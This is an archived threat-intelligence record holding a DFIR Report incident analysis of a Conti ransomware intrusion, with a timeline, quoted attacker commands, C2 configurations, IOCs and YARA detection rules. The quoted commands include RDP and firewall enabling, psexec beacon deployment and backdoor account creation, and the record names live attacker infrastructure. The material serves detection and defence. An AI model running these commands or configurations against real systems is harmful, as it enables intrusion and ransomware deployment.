{
	"id": "0988e4be-f54a-4652-a3de-80107274c5c3",
	"created_at": "2026-04-06T00:16:20.825395Z",
	"updated_at": "2026-04-10T03:24:24.04054Z",
	"deleted_at": null,
	"sha1_hash": "ec14be3cc488c68aa11538b12bb29e5c71bab049",
	"title": "Conti Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3004374,
	"plain_text": "Conti Ransomware\r\nBy editor\r\nPublished: 2021-05-12 · Archived: 2026-04-05 19:39:51 UTC\r\nIntroduction\r\nFirst seen in May 2020, Conti ransomware has quickly become one of the most common ransomware variants,\r\naccording to Coveware. As per Coveware’s Quarterly Ransomware Report (Q1 2021), Conti has the 2nd highest\r\nmarket share after Sodinokibi, which we wrote about here. \r\nIn April, we saw a threat actor go from an initial IcedID infection to deploying Conti ransomware domain wide in\r\ntwo days and 11 hours. The threat actors stayed dormant for most of this time, before jumping into action on an\r\nearly Saturday morning. The hands on keyboard activity lasted for two and a half hours. They utilized RDP,\r\nPsExec, and Cobalt Strike to move laterally within the environment before executing Conti in memory across all\r\nactive systems.\r\nSummary\r\nWe assess with moderate confidence that the initial vector used by the threat actor was a zip file, which included a\r\nmalicious JavaScript file, delivered through a phishing campaign. The JavaScript file would eventually download\r\nand execute the IcedID malware. Discovered in 2017, what started as a commodity malware is now currently\r\nbeing deployed as an initial access broker by ransomware threat actors.  \r\nWhile there was some initial discovery activity from the IcedID malware, it went quiet, just beaconing to\r\ncommand and control but not performing any other activity. After being dormant for over two days, a Cobalt\r\nStrike Beacon was dropped and executed on the system infected with IcedID. The threat actors then ran another\r\nround of discovery activity with native windows utilities such as nltest.exe, whoami.exe, and net.exe. They then\r\nsuccessfully escalated to SYSTEM privileges via Cobalt Strike’s built-in “named pipe impersonation”\r\n(GetSystem) functionality.    \r\nThe threat actors continued by moving laterally to the domain controllers on the network using SMB to transfer\r\nand execute a Cobalt Strike Beacon. During that time, we observed port scanning activity from one of the domain\r\ncontrollers, to identify open ports such as SSH, SMB, MSSQL, RDP and WinRM. After a brief gap of 15 minutes,\r\nthe threat actors used PsExec, to copy and execute a Cobalt Strike Beacon DLL on most of the systems in the\r\nnetwork.\r\nLater in the attack, the threat actor was seen establishing RDP connections from the beachhead host to the domain\r\ncontroller and other systems throughout the environment. This RDP activity was being proxied through the IcedID\r\nprocess running on that host, to a remote proxy over port 8080.\r\nTo establish persistence, the attackers created a new local user on one of the domain controllers and added it to the\r\nAdministrators group. Additionally, in an effort to evade any detection and prevention mechanisms, they disabled\r\nhttps://thedfirreport.com/2021/05/12/conti-ransomware/\r\nPage 1 of 24\n\nWindows Defender via a group policy modification.\r\nWithin two and a half hours of Cobalt Strike showing up in the environment and just over two days after the initial\r\nIcedID infection, the threat actors completed their objective of encrypting all systems. Conti was executed in\r\nmemory with the help of the Cobalt Strike Beacons domain wide. The ransomware note left by the infection\r\nincluded a link to their Tor site for further details.\r\nAfter further review of the environment (post encryption), we realized multiple systems (including a domain\r\ncontroller) were unable to be accessed and would not have been restorable even if the ransom had been paid.\r\nServices\r\nWe offer multiple services including a Threat Feed service which tracks Command and Control frameworks such\r\nas Cobalt Strike, Metasploit, Empire, PoshC2, etc. More information on this service and others can be found here. \r\nWe also have artifacts available from this case such as pcaps, memory captures, files, Kape packages, and more,\r\nunder our Security Researcher and Organization services.\r\nTimeline\r\nhttps://thedfirreport.com/2021/05/12/conti-ransomware/\r\nPage 2 of 24\n\nAnalysis and reporting completed by @pigerlin, @MetallicHack, @yatinwad, and 1 unnamed contributor.\r\nhttps://thedfirreport.com/2021/05/12/conti-ransomware/\r\nPage 3 of 24\n\nReviewed by @kostastsale, @RoxpinTeddy, and @TheDFIRReport\r\nMITRE ATT\u0026CK\r\nInitial Access \r\nThe IcedID DLL that we executed was most likely dropped through a zip file, which included a JavaScript file\r\nwithin it. Brad had a few posts about these around the time of this intrusion. 1 2 Thanks Brad!\r\nVarious attributes including the computer name and the OS version of the compromised system were sent through\r\nencoded cookie values.\r\nIcedID was executed via rundll32.exe and ran command and control over port 443 for the duration of the\r\nintrusion.\r\nrundll32.exe \"C:\\Users\\REDACTED\\AppData\\Local\\Temp\\rate_x32.dat\",update /i:\"LaborBetray\\license.dat\"\r\nDiscovery \r\nIcedID ran initial discovery after being executed on the beachhead. Various commands were executed to gather\r\nmore information about the compromised environment; including the currently logged on user, domain trusts,\r\nhttps://thedfirreport.com/2021/05/12/conti-ransomware/\r\nPage 4 of 24\n\ngroups, etc .\r\nipconfig /all\r\nsysteminfo\r\nwhoami /groups\r\nnet config workstation\r\nnltest /domain_trusts\r\nnltest /domain_trusts/all_trusts\r\nnet view /all /domain\r\nnet view /all\r\nnew group \"Domain Admins\" /domain\r\nAdditional discovery commands were executed by Cobalt Strike.\r\ncmd.exe /C whoami /groups\r\ncmd.exe /C query session\r\nhttps://thedfirreport.com/2021/05/12/conti-ransomware/\r\nPage 5 of 24\n\ncmd.exe /C dir %HOMEDRIVE%%HOMEPATH%\r\ncmd.exe /C nltest /domain_trusts\r\ncmd.exe /C nltest /dclist:\r\ncmd.exe /C net group \"Enterprise admins\" /domain\r\ncmd.exe /C net group \"Domain admins\" /domain\r\nAfter moving laterally to a domain controller, they began looking for what networks were present in the\r\nenvironment using dsquery.\r\ncmd.exe /C dsquery subnet -limit 0\r\nShortly thereafter, port scanning was observed coming from a domain controller looking for common ports (such\r\nas SSH, SMB, MSSQL, WinRM and RDP, etc.) on systems residing in the same subnet.\r\nPrivilege Escalation \r\nIn order to obtain SYSTEM level privileges, Cobalt Strike’s built-in named piped impersonation (GetSystem) was\r\nused: \r\nImage: “C:\\Windows\\System32\\cmd.exe”\r\nCommandLine: “C:\\Windows\\system32\\cmd.exe /c echo 4d64fbbbf34 \u003e \\\\.\\pipe\\b4312c”\r\nParentImage: “C:\\Windows\\System32\\runonce.exe”\r\nParentCommandLine: “C:\\Windows\\system32\\runonce.exe\"\r\nLateral Movement \r\nThe threat actor began lateral movement using remote execution of Cobalt Strike Beacon service binaries.\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\d8d6deb\\ImagePath\r\nDetails: \\\\HOSTNAME\\ADMIN$\\d8d6deb.exe\r\nhttps://thedfirreport.com/2021/05/12/conti-ransomware/\r\nPage 6 of 24\n\nAfter this initial activity, Cobalt Strike was used to enable RDP, and allow it through the firewall, on the domain\r\ncontrollers.\r\ncmd.exe /C reg add \"hklm\\system\\currentControlSet\\Control\\Terminal Server\" /v \"fDenyTSConnections\" /t\r\ncmd.exe /C netsh firewall set service type = remotedesktop mode = enable\r\ncmd.exe /C netsh firewall set rule group=\"remote desktop\" new enable=Yes\r\ncmd.exe /C netsh advfirewall set rule group=\"remote desktop\" new enable=Yes\r\nFollowing this, the threat actors then copied a Cobalt Strike Beacon DLL to the ADMIN$ share; and then,\r\ndistributed it throughout the environment using PsExec.\r\ncmd.exe /C copy 192145.dll \\\\\u003cINTERNAL_IP\u003e\\ADMIN$ /Y /Z\r\npsexec.exe -accepteula-d -s\\\\\u003cINTERNAL_IP\u003e rundll32.exe C:\\windows\\192145.dll,StartW\r\nhttps://thedfirreport.com/2021/05/12/conti-ransomware/\r\nPage 7 of 24\n\nFrom here, RDP connections were established from the beachhead host to systems throughout the environment.\r\nThe connections were proxied through the IcedID process.\r\nThe threat actor used a redirector (38.135.122[.]194:8080) to proxy the RDP traffic being passed through the\r\nIcedID process. The below traffic shows more details of the RDP session, including the username in the cookie.\r\nhttps://thedfirreport.com/2021/05/12/conti-ransomware/\r\nPage 8 of 24\n\nThis proxied traffic reported back the hostname of the threat actors machine as “mikespc”. We’re looking for you\r\nMike! ;)\r\nDefense Evasion\r\nTo evade detection, the threat actors disabled Windows Defender by adding the below to an already linked GPO.\r\nThey then force updated the GPO on all clients using Cobalt Strike.\r\nParentCommandLine  CommandLine \r\nC:\\Windows\\System32\\dllhost.exe \r\nC:\\Windows\\system32\\cmd.exe\r\n/C gpupdate /force \r\nhttps://thedfirreport.com/2021/05/12/conti-ransomware/\r\nPage 9 of 24\n\nC:\\Users\\USER\\AppData\\Local\\Temp\\icju1.exe \r\nC:\\Windows\\system32\\cmd.exe\r\n/C gpupdate /force \r\nC:\\Windows\\System32\\dllhost.exe \r\nC:\\Windows\\system32\\cmd.exe\r\n/C gpupdate /force \r\n“rundll32.exe” c:\\windows\\192145.dll,StartW \r\nC:\\Windows\\system32\\cmd.exe\r\n/C gpupdate /force \r\nRegistry Keys  Action \r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\r\nDefender\\DisableAntiSpyware \r\nDeleteValue \r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time\r\nMonitoring\\DisableRealtimeMonitoring \r\nDeleteValue \r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time\r\nMonitoring\\DisableBehaviorMonitoring \r\nDeleteValue \r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time\r\nMonitoring\\DisableIntrusionPreventionSystem \r\nDeleteValue \r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time\r\nProtection \r\nDeleteKey \r\nIn addition, other security services were stopped or uninstalled. \r\nNET STOP \"redacted\"\r\nEventID: 13\r\nDescription:RegistryEvent(ValueSet)\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\\u003credacted\u003e\\Start\r\nValue: DWORD (0x00000004)\r\nCommand and Control \r\nIcedID\r\n68.183.20[.]194:80 \r\nvaclicinni[.]xyz \r\n 83.97.20[.]160:443 \r\noxythuler[.]cyou \r\nexpertulthima[.]club \r\nhttps://thedfirreport.com/2021/05/12/conti-ransomware/\r\nPage 10 of 24\n\ndictorecovery[.]cyou \r\nthulleultinn[.]club \r\nKey identifier:82:92:07:FD:86:23:FE:26:0E:4A:42:5A:F7:C7:70:2A:45:4E:01:5B\r\nNot Before: Apr 22 15:27:02 2021 GMT\r\nNotAfter :Apr 22 15:27:02 2022 GMT\r\nCommonName: localhost\r\nCity= AU\r\nState= Some-State\r\nOrg = InternetWidgitsPty Ltd\r\nja3: a0e9f5d64349fb13191bc781f81f42e1\r\nja3s: ec74a5c51106f0419184d0dd08fb05bc\r\n159.89.140[.]116:443 \r\noxythuler[.]cyou \r\nthulleultinn[.]club \r\nKey Identifier: A4:EB:95:C2:04:91:E3:AF:67:7C:5D:B3:CB:DB:E3:38:90:5E:A7:68\r\nNot Before: Apr 13 14:59:41 2021 GMT\r\nNotAfter :Apr 13 14:59:41 2022 GMT\r\nCommonName: localhost\r\nCity= AU\r\nState= Some-State\r\nOrg = InternetWidgitsPty Ltd\r\nja3: a0e9f5d64349fb13191bc781f81f42e1\r\nja3s: ec74a5c51106f0419184d0dd08fb05bc\r\nCobalt Strike \r\n192.99.178[.]145:80 \r\ndimentos[.]com \r\nConfig: \r\nPort 443:\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\runonce[.]exe\",\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\runonce[.]exe\",\r\n\"Jitter\": 39,\r\n\"Method 2\": \"POST\", \"Port\": 443,\r\n\"Beacon Type\": \"8 (HTTPS)\",\r\n\"Polling\": 62719,\r\n\"HTTP Method Path 2\": \"/btn_bg\",\r\n\"Method 1\": \"GET\",\r\n\"C2 Server\": \"dimentos[.]com,/FAQ\"\r\nhttps://thedfirreport.com/2021/05/12/conti-ransomware/\r\nPage 11 of 24\n\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\runonce[.]exe\",\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\runonce[.]exe\",\r\n\"Jitter\": 39,\r\n\"Method 2\": \"POST\",\r\n\"Port\": 443,\r\n\"Beacon Type\": \"8 (HTTPS)\",\r\n\"Polling\": 62719,\r\n\"HTTP Method Path 2\": \"/btn_bg\",\r\n\"Method 1\": \"GET\",\r\n\"C2 Server\": \"dimentos[.]com,/bg\"\r\nPort 80:\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\runonce[.]exe\",\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\runonce[.]exe\",\r\n\"Jitter\": 39,\r\n\"Method 2\": \"POST\",\r\n\"Port\": 80,\r\n\"Beacon Type\": \"0 (HTTP)\",\r\n\"Polling\": 62719,\r\n\"HTTP Method Path 2\": \"/btn_bg\",\r\n\"Method 1\": \"GET\",\r\n\"C2 Server\": \"192[.]99[.]178[.]145,/r-arrow\"\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\runonce[.]exe\",\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\runonce[.]exe\",\r\n\"Jitter\": 39,\r\n\"Method 2\": \"POST\",\r\n\"Port\": 80,\r\n\"Beacon Type\": \"0 (HTTP)\",\r\n\"Polling\": 62719,\r\n\"HTTP Method Path 2\": \"/btn_bg\",\r\n\"Method 1\": \"GET\",\r\n\"C2 Server\": \"192[.]99[.]178[.]145,/bg\"\r\nMachine beaconing out to Cobalt Strike using the above profile\r\nhttps://thedfirreport.com/2021/05/12/conti-ransomware/\r\nPage 12 of 24\n\nPersistence\r\nAn account named “nuuser” was created by one of the Cobalt Strike Beacons. As these commands were run on a\r\ndomain controller, it essentially added the account to the Built-in Administrators domain group, granting it\r\nadministrative privileges in the AD domain.\r\nnet user /add /Ynuuser7HeC00l3stP@ssw0rd\r\nnetlocalgroupadministratorsnuuser/add\r\nhttps://thedfirreport.com/2021/05/12/conti-ransomware/\r\nPage 13 of 24\n\nCredential Access \r\nLSASS was accessed by an unusual process “runonce.exe” on multiple hosts, including a domain controller.\r\nEventID: 10\r\nDescription: Process Access\r\nSourceImage: “C:\\Windows\\System32\\runonce.exe”\r\nTargetImage: “C:\\Windows\\system32\\lsass.exe”\r\nSourceImage: C:\\Windows\\system32\\runonce.exe\"\r\nTargetImage: \"C:\\Windows\\system32\\lsass.exe\"\r\nGrantedAccess: 0x1010\r\nCallTrace: \"C:\\Windows\\SYSTEM32\\ntdll.dll+9c584|C:\\Windows\\System32\\KERNELBASE.dll+2730e|UNKNOWN(0000\r\nThe overpass-the hash technique was used to acquire a valid Kerberos ticket for the administrator user.\r\nImpact \r\nAbout two and a half hours after initial hands on keyboard activity, the Cobalt Strike Beacon processes running\r\nacross the target systems injected the Conti DLL into memory. Conti deployments using a DLL seem to have first\r\nstarted showing up in December 2020.\r\nSome traces of this particular DLL were found in the memory dump taken from one of the compromised systems.\r\nhttps://thedfirreport.com/2021/05/12/conti-ransomware/\r\nPage 14 of 24\n\nWe were unable to reconstruct the DLL from memory but Maxime Thiebaut (@0xThiebaut) from NVISO helped\r\nus out. The Yara rule, located in the detections section below was made possible due to him reconstructing the\r\nDLL. Thanks Maxime!\r\nConti scans the network for 445/SMB, looking for machines to encrypt.\r\nRansom note\r\nWhich leads you here.\r\nhttps://thedfirreport.com/2021/05/12/conti-ransomware/\r\nPage 15 of 24\n\nThe threat actors asked for 150k and could have been talked down at least ~20%.\r\nMultiple machines within the environment were not usable after being ransomed including a domain controller.\r\nThe machines were left like this and you were not able to do anything but press control+alt+delete. Paying the\r\nransom will not help you here.\r\nPivots\r\nhttps://thedfirreport.com/2021/05/12/conti-ransomware/\r\nPage 16 of 24\n\nWhile researching the infrastructure related to this campaign, we found the threat actor revealed further\r\ninfrastructure. The domain associated with the Cobalt Strike C2 (dimentos[.]com) has an unredacted Whois record\r\nthat reveals several other domains also registered by the address pokix19891[@]kindbest[.]com. You’ll notice the\r\nfake address and fake phone number as well.\r\nAll the domains were registered on 2021-03-30, and according to public data available in VirusTotal, three of them\r\nhave been associated with Cobalt Strike infrastructure so far; the domain seen in this intrusion, powelin[.]com and\r\nawesents[.]com.\r\nhttps://thedfirreport.com/2021/05/12/conti-ransomware/\r\nPage 17 of 24\n\nThe two other domains (jocinet[.]com, ilimennt[.]com) have subdomains that look like name servers (ns1 and\r\nns2), which were pointed to two of the Cobalt Strike hosting IP’s. All of this infrastructure was hosted on the VPS\r\nprovider OVH.\r\nIOCs\r\nFiles\r\nhttps://thedfirreport.com/2021/05/12/conti-ransomware/\r\nPage 18 of 24\n\nb52c0640957e5032b5160578f8cb99f9b066fde4f9431ee6869b2eea67338f28.dll.exe\r\nb52c0640957e5032b5160578f8cb99f9b066fde4f9431ee6869b2eea67338f28\r\nicju1.exe\r\ne54f38d06a4f11e1b92bb7454e70c949d3e1a4db83894db1ab76e9d64146ee06\r\nrate_x32.dat\r\neb79168391e64160883b1b3839ed4045b4fd40da14d6eec5a93cfa9365503586\r\n192145.dll\r\nf29bc338e63a62c24c301c04961084013816733dad446a29c20d4413c5c818af9\r\nNetwork \r\nIcedID \r\nvaclicinni[.]xyz  \r\nthulleultinn[.]club \r\noxythuler[.]cyou \r\ndictorecovery[.]cyou \r\nexpertulthima[.]club \r\n68.183.20[.]194:80 \r\n159.89.140[.]116:443 \r\n83.97.20[.]160:443 \r\nCobalt Strike\r\ndimentos[.]com \r\n192.99.178[.]145:80\r\nProxy\r\n38.135.122[.]194:8080 \r\nDetections \r\nSuricata \r\nET MALWARE Win32/IcedID Requesting Encoded Binary M4ET MALWARE\r\nW32/Photoloader.Downloader Request Cookie \r\nET POLICY PE EXE or DLL Windows file download HTTP \r\nET INFO Executable Retrieved With Minimal HTTP Headers – Potential Second Stage Download \r\nET INFO Packed Executable Download \r\nET POLICY OpenSSL Demo CA – Internet Widgits Pty \r\nATTACK [PTsecurity] Overpass the hash. Encryption downgrade activity to ARCFOUR-HMAC-MD5 \r\nET SCAN Behavioral Unusual Port 135 traffic Potential Scan or Infection \r\nET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection \r\nhttps://thedfirreport.com/2021/05/12/conti-ransomware/\r\nPage 19 of 24\n\nET SCAN Behavioral Unusual Port 1434 traffic Potential Scan or Infection \r\nET SCAN Behavioral Unusual Port 1435 traffic Potential Scan or Infection\r\nSigma \r\nSigma Rule Converter for SIEMs and EDRs: https://uncoder.io/ \r\nYARA\r\n/*\r\nYARA Rule Set\r\nAuthor: The DFIR Report\r\nDate: 2021-05-09\r\nIdentifier: 3584\r\nReference: https://thedfirreport.com\r\n*/\r\n/* Rule Set ----------------------------------------------------------------- */\r\nimport \"pe\"\r\nrule icedid_rate_x32 {\r\nmeta:\r\ndescription = \"files - file rate_x32.dat\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com\"\r\ndate = \"2021-05-09\"\r\nhash1 = \"eb79168391e64160883b1b3839ed4045b4fd40da14d6eec5a93cfa9365503586\"\r\nstrings:\r\n$s1 = \"UAWAVAUATVWSH\" fullword ascii\r\n$s2 = \"UAWAVVWSPH\" fullword ascii\r\n$s3 = \"AWAVAUATVWUSH\" fullword ascii\r\n$s4 = \"update\" fullword ascii /* Goodware String - occured 207 times */\r\n$s5 = \"?klopW@@YAHXZ\" fullword ascii\r\n$s6 = \"?jutre@@YAHXZ\" fullword ascii\r\n$s7 = \"PluginInit\" fullword ascii\r\n$s8 = \"[]_^A\\\\A]A^A_\" fullword ascii\r\n$s9 = \"e8[_^A\\\\A]A^A_]\" fullword ascii\r\n$s10 = \"[_^A\\\\A]A^A_]\" fullword ascii\r\n$s11 = \"Kts=R,4iu\" fullword ascii\r\n$s12 = \"mqr55c\" fullword ascii\r\n$s13 = \"R,4i=Bj\" fullword ascii\r\n$s14 = \"Ktw=R,4iu\" fullword ascii\r\n$s15 = \"Ktu=R,4iu\" fullword ascii\r\n$s16 = \"Kt{=R,4iu\" fullword ascii\r\n$s17 = \"KVL.Mp\" fullword ascii\r\n$s18 = \"Kt|=R,4iu\" fullword ascii\r\n$s19 = \"=8c[Vt8=\" fullword ascii\r\nhttps://thedfirreport.com/2021/05/12/conti-ransomware/\r\nPage 20 of 24\n\n$s20 = \"Ktx=R,4iu\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 700KB and\r\n( pe.imphash() == \"15787e97e92f1f138de37f6f972eb43c\" and ( pe.exports(\"?jutre@@YAHXZ\") and pe.exports\r\n}\r\nrule conti_cobaltstrike_192145 {\r\nmeta:\r\ndescription = \"files - file 192145.dll\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com\"\r\ndate = \"2021-05-09\"\r\nhash1 = \"29bc338e63a62c24c301c04961084013816733dad446a29c20d4413c5c818af9\"\r\nstrings:\r\n$x1 = \"cmd.exe /c echo NGAtoDgLpvgJwPLEPFdj\u003e\\\"%s\\\"\u0026exit\" fullword ascii\r\n$s2 = \"veniamatquiest90.dll\" fullword ascii\r\n$s3 = \"Quaerat magni assumenda nihil architecto labore ullam autem unde temporibus mollitia illum\" fu\r\n$s4 = \"Quaerat tempora culpa provident\" fullword ascii\r\n$s5 = \"Velit consequuntur quisquam tempora error\" fullword ascii\r\n$s6 = \"Quo omnis repellat ut expedita temporibus eius fuga error\" fullword ascii\r\n$s7 = \"Dolores ullam tempora error distinctio ut natus facere quibusdam\" fullword ascii\r\n$s8 = \"Corporis minima omnis qui est temporibus sint quo error magnam\" fullword ascii\r\n$s9 = \"Officia sit maiores deserunt nobis tempora deleniti aut et quidem fugit\" fullword ascii\r\n$s10 = \"Rerum tenetur sapiente est tempora qui deserunt\" fullword ascii\r\n$s11 = \"Sed nulla quaerat porro error excepturi\" fullword ascii\r\n$s12 = \"Aut tempore quo cumque dicta ut quia in\" fullword ascii\r\n$s13 = \"Doloribus commodi repudiandae voluptates consequuntur neque tempora ut neque nemo ad ut\" full\r\n$s14 = \"Tempore possimus aperiam nam mollitia illum hic at ut doloremque\" fullword ascii\r\n$s15 = \"Dolorum eum ipsum tempora non et\" fullword ascii\r\n$s16 = \"Quas alias illum laborum tempora sit est rerum temporibus dicta et\" fullword ascii\r\n$s17 = \"Et quia aut temporibus enim repellat dolores totam recusandae repudiandae\" fullword ascii\r\n$s18 = \"Sed velit ipsa et dolor tempore sunt nostrum\" fullword ascii\r\n$s19 = \"Veniam voluptatem aliquam et eaque tempore tenetur possimus\" fullword ascii\r\n$s20 = \"Possimus suscipit placeat dolor quia tempora voluptas qui fugiat et accusantium\" fullword asc\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 2000KB and\r\n( pe.imphash() == \"5cf3cdfe8585c01d2673249153057181\" and pe.exports(\"StartW\") or ( 1 of ($x*) or 4 of\r\n}\r\nrule conti_cobaltstrike_icju1 {\r\nmeta:\r\ndescription = \"files - file icju1.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com\"\r\ndate = \"2021-05-09\"\r\nhash1 = \"e54f38d06a4f11e1b92bb7454e70c949d3e1a4db83894db1ab76e9d64146ee06\"\r\nstrings:\r\n$x1 = \"cmd.exe /c echo NGAtoDgLpvgJwPLEPFdj\u003e\\\"%s\\\"\u0026exit\" fullword ascii\r\nhttps://thedfirreport.com/2021/05/12/conti-ransomware/\r\nPage 21 of 24\n\n$s2 = \"veniamatquiest90.dll\" fullword ascii\n$s3 = \"Quaerat magni assumenda nihil architecto labore ullam autem unde temporibus mollitia illum\" fu\n$s4 = \"Quaerat tempora culpa provident\" fullword ascii\n$s5 = \"Velit consequuntur quisquam tempora error\" fullword ascii\n$s6 = \"Quo omnis repellat ut expedita temporibus eius fuga error\" fullword ascii\n$s7 = \"Dolores ullam tempora error distinctio ut natus facere quibusdam\" fullword ascii\n$s8 = \"Corporis minima omnis qui est temporibus sint quo error magnam\" fullword ascii\n$s9 = \"Officia sit maiores deserunt nobis tempora deleniti aut et quidem fugit\" fullword ascii\n$s10 = \"Rerum tenetur sapiente est tempora qui deserunt\" fullword ascii\n$s11 = \"Sed nulla quaerat porro error excepturi\" fullword ascii\n$s12 = \"Aut tempore quo cumque dicta ut quia in\" fullword ascii\n$s13 = \"Doloribus commodi repudiandae voluptates consequuntur neque tempora ut neque nemo ad ut\" full\n$s14 = \"Tempore possimus aperiam nam mollitia illum hic at ut doloremque\" fullword ascii\n$s15 = \"Dolorum eum ipsum tempora non et\" fullword ascii\n$s16 = \"Quas alias illum laborum tempora sit est rerum temporibus dicta et\" fullword ascii\n$s17 = \"Et quia aut temporibus enim repellat dolores totam recusandae repudiandae\" fullword ascii\n$s18 = \"Sed velit ipsa et dolor tempore sunt nostrum\" fullword ascii\n$s19 = \"Veniam voluptatem aliquam et eaque tempore tenetur possimus\" fullword ascii\n$s20 = \"Possimus suscipit placeat dolor quia tempora voluptas qui fugiat et accusantium\" fullword asc\ncondition:\nuint16(0) == 0x5a4d and filesize \u003c 2000KB and\n( pe.imphash() == \"a6d9b7f182ef1cfe180f692d89ecc759\" or ( 1 of ($x*) or 4 of them ) )\n}\nrule conti_v3 {\nmeta:\ndescription = \"conti_yara - file conti_v3.dll\"\nauthor = \"pigerlin\"\nreference = \"https://thedfirreport.com\"\ndate = \"2021-05-09\"\nhash1 = \"8391dc3e087a5cecba74a638d50b771915831340ae3e027f0bb8217ad7ba4682\"\nstrings:\n$s1 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\n$s2 = \"conti_v3.dll\" fullword ascii\n$s3 = \" \" fullword ascii\n$s4 = \" Type Descriptor'\" fullword ascii\n$s5 = \"operator co_await\" fullword ascii\n$s6 = \" \" fullword ascii\n$s7 = \"api-ms-win-appmodel-runtime-l1-1-2\" fullword wide\n$s8 = \" Base Class Descriptor at (\" fullword ascii\n$s9 = \" Class Hierarchy Descriptor'\" fullword ascii\n$s10 = \" Complete Object Locator'\" fullword ascii\n$s11 = \" delete[]\" fullword ascii\n$s12 = \" \" fullword ascii\n$s13 = \"__swift_1\" fullword ascii\nhttps://thedfirreport.com/2021/05/12/conti-ransomware/\nPage 22 of 24\n\n$s15 = \"__swift_2\" fullword ascii\r\n$s19 = \" delete\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 700KB and\r\nall of them\r\n}\r\nrule conti_cobaltstrike_192145_icju1_0 {\r\nmeta:\r\ndescription = \"files - from files 192145.dll, icju1.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com\"\r\ndate = \"2021-05-09\"\r\nhash1 = \"29bc338e63a62c24c301c04961084013816733dad446a29c20d4413c5c818af9\"\r\nhash2 = \"e54f38d06a4f11e1b92bb7454e70c949d3e1a4db83894db1ab76e9d64146ee06\"\r\nstrings:\r\n$x1 = \"cmd.exe /c echo NGAtoDgLpvgJwPLEPFdj\u003e\\\"%s\\\"\u0026exit\" fullword ascii\r\n$s2 = \"veniamatquiest90.dll\" fullword ascii\r\n$s3 = \"Quaerat magni assumenda nihil architecto labore ullam autem unde temporibus mollitia illum\" fu\r\n$s4 = \"Quaerat tempora culpa provident\" fullword ascii\r\n$s5 = \"Dolores ullam tempora error distinctio ut natus facere quibusdam\" fullword ascii\r\n$s6 = \"Velit consequuntur quisquam tempora error\" fullword ascii\r\n$s7 = \"Corporis minima omnis qui est temporibus sint quo error magnam\" fullword ascii\r\n$s8 = \"Quo omnis repellat ut expedita temporibus eius fuga error\" fullword ascii\r\n$s9 = \"Officia sit maiores deserunt nobis tempora deleniti aut et quidem fugit\" fullword ascii\r\n$s10 = \"Rerum tenetur sapiente est tempora qui deserunt\" fullword ascii\r\n$s11 = \"Sed nulla quaerat porro error excepturi\" fullword ascii\r\n$s12 = \"Aut tempore quo cumque dicta ut quia in\" fullword ascii\r\n$s13 = \"Doloribus commodi repudiandae voluptates consequuntur neque tempora ut neque nemo ad ut\" full\r\n$s14 = \"Tempore possimus aperiam nam mollitia illum hic at ut doloremque\" fullword ascii\r\n$s15 = \"Et quia aut temporibus enim repellat dolores totam recusandae repudiandae\" fullword ascii\r\n$s16 = \"Dolorum eum ipsum tempora non et\" fullword ascii\r\n$s17 = \"Quas alias illum laborum tempora sit est rerum temporibus dicta et\" fullword ascii\r\n$s18 = \"Sed velit ipsa et dolor tempore sunt nostrum\" fullword ascii\r\n$s19 = \"Veniam voluptatem aliquam et eaque tempore tenetur possimus\" fullword ascii\r\n$s20 = \"Possimus suscipit placeat dolor quia tempora voluptas qui fugiat et accusantium\" fullword asc\r\ncondition:\r\n( uint16(0) == 0x5a4d and filesize \u003c 2000KB and ( 1 of ($x*) and 4 of them )\r\n) or ( all of them )\r\n}\r\nMITRE: \r\nCommand and Scripting Interpreter – T1059\r\nExternal Proxy – T1090.002\r\nhttps://thedfirreport.com/2021/05/12/conti-ransomware/\r\nPage 23 of 24\n\nRemote Desktop Protocol – T1021.001\r\nOS Credential Dumping – T1003\r\nPass the Hash – T1550.002\r\nService Execution – T1569.002\r\nSMB/Windows Admin Shares – T1021.002\r\nData Encrypted for Impact – T1486\r\nSystem Owner/User Discovery – T1033\r\nPermission Groups Discovery – T1069\r\nApplication Layer Protocol – T1071\r\nProcess Injection – T1055\r\nGroup Policy Modification – T1484\r\nAccess Token Manipulation – T1134\r\nCreate Account – T1136\r\nRemote System Discovery – T1018\r\nNetwork Service Scanning – T1046\r\nDomain Account – T1087.002\r\nImpair Defenses – T1562\r\nInternal case: 3584\r\nSource: https://thedfirreport.com/2021/05/12/conti-ransomware/\r\nhttps://thedfirreport.com/2021/05/12/conti-ransomware/\r\nPage 24 of 24",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://thedfirreport.com/2021/05/12/conti-ransomware/"
	],
	"report_names": [
		"conti-ransomware"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
